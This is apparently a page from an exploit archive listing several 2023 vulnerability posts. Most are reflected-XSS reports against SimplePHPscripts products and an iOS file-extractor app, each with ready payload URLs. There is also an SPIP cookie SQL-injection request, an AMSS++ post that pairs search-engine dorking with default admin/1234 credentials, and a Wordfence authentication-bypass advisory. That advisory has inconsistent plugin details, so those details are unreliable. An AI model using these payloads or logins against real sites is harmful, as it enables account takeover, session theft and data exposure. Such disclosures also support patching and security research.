<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Vulnerability ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr :<br />│ Website : https://simplephpscripts.com/simple-blog-php/ │<br />│ Vendor : SimplePHPscripts │<br />│ Software : Simple Blog 3.2 │<br />│ Vuln Type: Reflected XSS │<br />│ Impact : Manipulate the content of the site │<br />│ │<br />│────────────────────────────────────────────────────────────────────────────────────────│<br />│ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ The attacker can send to victim a link containing a malicious URL in an email or │<br />│ instant message can perform a wide variety of actions, such as stealing the victim's │<br />│ session token or login credentials │<br />│ │<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Greets:<br /><br /> The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09 <br /> <br /> CryptoJob (Twitter) twitter.com/0x0CryptoJob<br /> <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2023 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /><br />Path: /preview.php<br /><br />URL parameter is vulnerable to RXSS<br /><br />https://website/preview.php/bxsfz"><script>alert(1)</script>tkwni?p=2&cat_id=&search=<br /><br /><br />Path: /preview.php<br /><br />GET 'SysMessage' parameter is vulnerable to RXSS<br /><br />https://website/preview.php?pid=59&p=&search=&cat_id=&SysMessage=uyd1u%3cscript%3ealert(1)%3c%2fscript%3ey6sfb<br /><br /><br /><br />[-] Done<br /></code></pre>
<pre><code># Exploit Title: Zip & RAR FileExtractor v5.7 - Reflected XSS<br /># Vendor Homepage: Penghui Zhao<br /># Software Link: https://apps.apple.com/tr/app/zip-rar-file-extractor/id769409043?l=en<br /># Date: 2023-06-20<br /># Exploit Author: tmrswrr<br /># Category : ios app<br /># Version: v5.7<br /># Tested on: Windows/Linux<br /><br /><br />## Description:<br /><br />>> Go to Wi-Fi Transfer section in zip rar file extractor app<br />>> It will be create link : 192.168.1.104:8080<br />>> When open link your browser , write payload, xss payload execute page and see alert button<br /><br />Url: http://192.168.1.104:8080/download?path=%22%3E%3Cscript%3Ealert(document.domain)%3C%2fscript%3E<br />Payload: %22%3E%3Cscript%3Ealert(document.domain)%3C%2fscript%3E<br /></code></pre>
<pre><code>Description: WordPress Social Login and Register (Discord, Google, Twitter, LinkedIn) <= 7.6.4 – Authentication Bypass <br /><br />Affected Plugin: WordPress Social Login and Register (Discord, Google, Twitter, LinkedIn)<br /><br />Plugin Slug: woocommerce-abandoned-cart<br /><br />Affected Versions: <= 7.6.4<br /><br />CVE ID: CVE-2023-2982<br /><br />CVSS Score: 9.8 (Critical)<br /><br />CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H<br /><br />Researcher/s: Lana Codes <br /><br />Fully Patched Version: 7.6.5<br /><br />The WordPress Social Login and Register (Discord, Google, Twitter, LinkedIn) plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 7.6.4. This is due to insufficient encryption on the user being supplied during a login validated through the plugin. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they know the email address associated with that user. This was partially patched in version 7.6.4 and fully patched in version 7.6.5.<br /><br />Technical Analysis<br /><br />The WordPress Social Login and Register plugin, according to its settings, provides the ability for users to login to a WordPress website using a social login through various popular social media platforms and service providers. Examining the code reveals that there is a case with custom apps, where the data is sent encrypted during the login process. The data required for login must be decrypted using the secret key at the request.<br /><br />[View this code snippet on the blog] <br /><br />While encrypting this information would normally provide protection against manipulating the request and prevent identity spoofing, we unfortunately found that the encryption key is hardcoded in vulnerable versions of the plugin, which means that threat actors also had access to the key which was not unique per WordPress installation. This makes it possible for attackers to craft a valid request containing a properly encrypted email address which vulnerable versions of the plugin use during the login process to determine the user.<br /><br />Ultimately, this makes it possible for threat actors to bypass authentication and gain access to arbitrary accounts on sites running a vulnerable version of the plugin. As always, authentication bypass vulnerabilities and resulting access to high privileged user accounts, make it easy for threat actors to completely compromise a vulnerable WordPress site and further infect the victim.<br /><br />Disclosure Timeline<br /><br />May 28, 2023 – Discovery of the Authentication Bypass vulnerability in WordPress Social Login and Register.<br /><br />May 30, 2023 – We initiate contact with the plugin vendor asking that they confirm the inbox for handling the discussion.<br /><br />June 2, 2023 – The vendor confirms the inbox for handling the discussion.<br /><br />June 2, 2023 – We send over the full disclosure details. The vendor acknowledges the report and begins working on a fix.<br /><br />June 2, 2023 – Wordfence Premium, Care, and Response users receive a firewall rule to provide protection against any exploits that may target this vulnerability. Please note we delayed the firewall rule to prevent completely breaking the plugin’s core functionality.<br /><br />June 14, 2023 – A fully patched version of the plugin, 7.6.5, is released.<br /><br />July 2, 2023 – Wordfence Free users receive the same protection.<br /><br />Conclusion<br /><br />In this blog post, we have detailed an Authentication Bypass vulnerability within the WordPress Social Login and Register plugin affecting versions 7.6.4 and earlier. This vulnerability allows threat actors to bypass authentication and gain access to the accounts of users who have abandoned their carts. The vulnerability has been fully addressed in version 7.6.5 of the plugin.<br /><br />We encourage WordPress users to verify that their sites are updated to the latest patched version of WordPress Social Login and Register as soon as possible.<br /><br />Wordfence Premium, Wordfence Care, and Wordfence Response users received a firewall rule to protect against any exploits targeting this vulnerability on June 2, 2023. Sites still using the free version of Wordfence will receive the same protection on July 2, 2023.<br /><br />If you know someone who uses this plugin on their site, we recommend sharing this advisory with them to ensure their site remains secure, as this vulnerability poses a significant risk.<br /><br />For security researchers looking to disclose vulnerabilities responsibly and obtain a CVE ID, you can submit your findings to Wordfence Intelligence and potentially earn a spot on our leaderboard.<br /><br /></code></pre>
<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Vulnerability ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr :<br />│ Website : https://simplephpscripts.com/photo-gallery-php/ │<br />│ Vendor : SimplePHPscripts │<br />│ Software : Photo Gallery 2.0 │<br />│ Vuln Type: Reflected XSS │<br />│ Impact : Manipulate the content of the site │<br />│ │<br />│────────────────────────────────────────────────────────────────────────────────────────│<br />│ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ The attacker can send to victim a link containing a malicious URL in an email or │<br />│ instant message can perform a wide variety of actions, such as stealing the victim's │<br />│ session token or login credentials │<br />│ │<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Greets:<br /><br /> The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09 <br /> <br /> CryptoJob (Twitter) twitter.com/0x0CryptoJob<br /> <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2023 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /><br />Path: /preview.php<br /><br />URL parameter is vulnerable to RXSS<br /><br />https://website/preview.php/fm7sk"><script>alert(1)</script>xfvd1?cat_id=5<br /><br /><br /><br />[-] Done<br /></code></pre>
<pre><code>## Title: spip-v4.2.3 SQLi-cookie session vulnerability - Server Side<br />Sensitive information Disclosure!<br />## Author: nu11secur1ty<br />## Date: 06.28.2023<br />## Vendor: https://www.spip.net/en_rubrique25.html<br />## Software: https://files.spip.net/spip/archives/spip-v4.2.3.zip<br />## Reference: https://portswigger.net/web-security/information-disclosure<br /><br /><br /><br />## Description:<br />The spip_session cookie appears to be vulnerable to SQL injection<br />attacks. A single quote was submitted in the spip_session cookie, and<br />a database error message was returned. Two single quotes were then<br />submitted and the error message disappeared. You should review the<br />contents of the error message, and the application's handling of other<br />input, to confirm whether a vulnerability is present.<br />Additionally, the payload ' and '8025'='8025 were submitted in the<br />spip_session cookie, and a database error message was returned.<br />The attacker who has an account easily can dump almost all sensitive<br />information from the server. This is the wrong configuration of the<br />sessions of this app and a serious bug in the backend execution -<br />function modules of this app which bug is coming from the development<br />team of this web application! No one user account or even broadcast<br />admin account, must not be seeing inside information of the server,<br />except on the layer 2 level, which must be a LOCAL ADMINISTRATOR! from<br />the side of the developers of this web app.<br /><br />STATUS: HIGH-CRITICAL Vulnerability<br /><br />[+]Exploit:<br />```GET<br />GET /pwnedhost7/ecrire/?exec=info HTTP/1.1<br />Host: 192.168.100.45<br />Cookie: spip_admin=%40pwned%40pwned.com; spip_accepte_ajax=1;<br />spip_session=1_c9209323400f315bb516fdc7c5345eae<br />Cache-Control: max-age=0<br />Sec-Ch-Ua:<br />Sec-Ch-Ua-Mobile: ?0<br />Sec-Ch-Ua-Platform: ""<br />Upgrade-Insecure-Requests: 1<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)<br />AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134<br />Safari/537.36<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7<br />Sec-Fetch-Site: none<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-User: ?1<br />Sec-Fetch-Dest: document<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br />Connection: close<br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/SPIP/spip-v4.2.3)<br /><br />## Proof and Exploit:<br />[href](https://www.nu11secur1ty.com/2023/06/spip-v423-sqli-cookie-session.html)<br /><br />## Time spend:<br />03:15:00<br /><br /></code></pre>
<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Vulnerability ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr :<br />│ Website : https://simplephpscripts.com/news-script-php-pro/ │<br />│ Vendor : SimplePHPscripts │<br />│ Software : News Script Pro is 2.4 │<br />│ Vuln Type: Reflected XSS │<br />│ Impact : Manipulate the content of the site │<br />│ │<br />│────────────────────────────────────────────────────────────────────────────────────────│<br />│ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ The attacker can send to victim a link containing a malicious URL in an email or │<br />│ instant message can perform a wide variety of actions, such as stealing the victim's │<br />│ session token or login credentials │<br />│ │<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Greets:<br /><br /> The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09 <br /> <br /> CryptoJob (Twitter) twitter.com/0x0CryptoJob<br /> <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2023 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /><br />Path: /preview.php<br /><br />URL parameter is vulnerable to RXSS<br /><br />https://website/preview.php/mn71q"><script>alert(1)</script>p15vr?cat_id=&p=2<br /><br /><br />Path: /preview.php<br /><br />https://website/preview.php?id=467&p=2&search=&SysMessage=ahw5l%3Cscript%3Ealert(1)%3C/script%3Eulvrb<br /><br /><br /><br />[-] Done<br /></code></pre>
<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Vulnerability ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr :<br />│ Website : https://simplephpscripts.com/funeral-script-php/ │<br />│ Vendor : SimplePHPscripts │<br />│ Software : Funeral Script 3.1 │<br />│ Vuln Type: Reflected XSS │<br />│ Impact : Manipulate the content of the site │<br />│ │<br />│────────────────────────────────────────────────────────────────────────────────────────│<br />│ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ The attacker can send to victim a link containing a malicious URL in an email or │<br />│ instant message can perform a wide variety of actions, such as stealing the victim's │<br />│ session token or login credentials │<br />│ │<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Greets:<br /><br /> The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09 <br /> <br /> CryptoJob (Twitter) twitter.com/0x0CryptoJob<br /> <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2023 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /><br />Path: /preview.php<br /><br />URL parameter is vulnerable to RXSS<br /><br />https://website/preview.php/a8udq"><script>alert(1)</script>zl141?id=11&p=&search=&SysMessage=<br /><br /><br />Path: /preview.php<br /><br />GET 'SysMessage' parameter is vulnerable to RXSS<br /><br />https://website/preview.php?id=11&p=&search=&SysMessage=phl3z%3cscript%3ealert(1)%3c%2fscript%3ea504d<br /><br /><br />Path: /preview.php<br /><br />GET 'p' parameter is vulnerable to RXSS<br /><br />https://website/preview.php?id=11&p=y26tx%22%3e%3cscript%3ealert(1)%3c%2fscript%3ellgzs&search=&SysMessage=<br /><br /><br />[-] Done<br /></code></pre>
<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Vulnerability ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr :<br />│ Website : https://simplephpscripts.com/faq-script-php/ │<br />│ Vendor : SimplePHPscripts │<br />│ Software : FAQ Script 2.3 │<br />│ Vuln Type: Reflected XSS │<br />│ Impact : Manipulate the content of the site │<br />│ │<br />│────────────────────────────────────────────────────────────────────────────────────────│<br />│ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ The attacker can send to victim a link containing a malicious URL in an email or │<br />│ instant message can perform a wide variety of actions, such as stealing the victim's │<br />│ session token or login credentials │<br />│ │<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Greets:<br /><br /> The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09 <br /> <br /> CryptoJob (Twitter) twitter.com/0x0CryptoJob<br /> <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2023 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /><br />Path: /preview.php<br /><br />URL parameter is vulnerable to RXSS<br /><br />https://website/preview.php/hov24"><script>alert(1)</script>mcpji?act=faq&cat_id=1&search=<br /><br /><br /><br />Path: /preview.php<br /><br />GET 'SysMessage' parameter is vulnerable to RXSS<br /><br />https://website/preview.php?act=new&SysMessage=c513c%3cscript%3ealert(1)%3c%2fscript%3eujbsi<br /><br /><br /><br />[-] Done<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : AMSS++ v 2.0 Insecure Settings Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 65.0(32-bit) | <br />| # Vendor : http://amssplus.ubn4.go.th/amssplus_download/amssplus_4_31_install.rar | <br />| # Dork : แนะนำให้ใช้บราวเซอร์ Google Chrome "AMSS++" |<br />====================================================================================================================================<br /><br />poc :<br /><br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Use Login : User = admin & pass = 1234<br /><br />[+] http://127.0.0.1/pmss/index.php<br /><br />====Greetings to :=======================================================================================================================<br />| jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* CraCkEr * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh |<br />=========================================================================================================================================<br /></code></pre>
<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Vulnerability ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr :<br />│ Website : https://simplephpscripts.com/event-script-php/ │<br />│ Vendor : SimplePHPscripts │<br />│ Software : Event Script 2.1 │<br />│ Vuln Type: Reflected XSS │<br />│ Impact : Manipulate the content of the site │<br />│ │<br />│────────────────────────────────────────────────────────────────────────────────────────│<br />│ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ The attacker can send to victim a link containing a malicious URL in an email or │<br />│ instant message can perform a wide variety of actions, such as stealing the victim's │<br />│ session token or login credentials │<br />│ │<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Greets:<br /><br /> The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09 <br /> <br /> CryptoJob (Twitter) twitter.com/0x0CryptoJob<br /> <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2023 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /><br />Path: /preview.php<br /><br />URL parameter is vulnerable to RXSS<br /><br />https://website/preview.php/ekhfb"><script>alert(1)</script>cg9xj?search=123<br /><br /><br /><br />Path: /preview.php<br /><br />GET 'message' parameter is vulnerable to RXSS<br /><br />https://website/preview.php?message=fy3sr<script>alert(1)</script>aqblo<br /><br /><br /><br />[-] Done<br /></code></pre>
Archives
Categories
- All Exploits 4122
- Remote Code Execution
- SQL Injection
- Command Injection
- Local File Inclusion
- Cross Site Scripting
- Privilege Escalation
- Denial Of Service
- Authentication Bypass
- Buffer Overflow